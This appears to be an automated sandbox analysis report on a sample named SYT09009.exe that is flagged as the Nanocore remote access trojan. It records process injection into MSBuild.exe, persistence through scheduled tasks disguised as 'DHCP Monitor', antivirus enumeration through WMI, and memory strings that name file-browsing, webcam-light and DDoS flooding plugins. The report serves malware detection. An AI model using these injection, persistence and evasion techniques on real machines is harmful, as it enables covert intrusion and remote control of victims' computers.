Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: MSBuild.exe, 00000001.00000003.316218325.0000000000CC5000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]	0_2_10001000
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_10001110 mov eax, dword ptr fs:[00000030h]	0_2_10001110
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_024434C3 mov eax, dword ptr fs:[00000030h]	0_2_024434C3
Source: C:\Users\user\Desktop\SYT09009.exe	Code function: 0_2_024431FE mov eax, dword ptr fs:[00000030h]	0_2_024431FE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\SYT09009.exe

Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\SYT09009.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 753008

Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\SYT09009.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA63C.tmp'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpA9C7.tmp'	Jump to behavior

Source: MSBuild.exe, 00000001.00000003.353432362.0000000000D01000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: MSBuild.exe, 00000001.00000003.334314497.0000000000D01000.00000004.00000001.sdmp	Binary or memory string: Program Manager (x86)\DHCP Monitor\dhcpmon.exeBuild.exe
Source: MSBuild.exe, 00000001.00000003.316218325.0000000000CC5000.00000004.00000001.sdmp	Binary or memory string: Program Manager (x86)\DHCP Monitor\dhcpmon.exeBuild.exe43

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SYT09009.exe

0_2_00403348

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SYT09009.exe PID: 4956, type: MEMORY
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SYT09009.exe.2450000.4.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: SYT09009.exe, 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: MSBuild.exe, 00000001.00000003.258062190.0000000004043000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.251070693.0000000002450000.00000004.00000001.sdmp, type: MEMORY
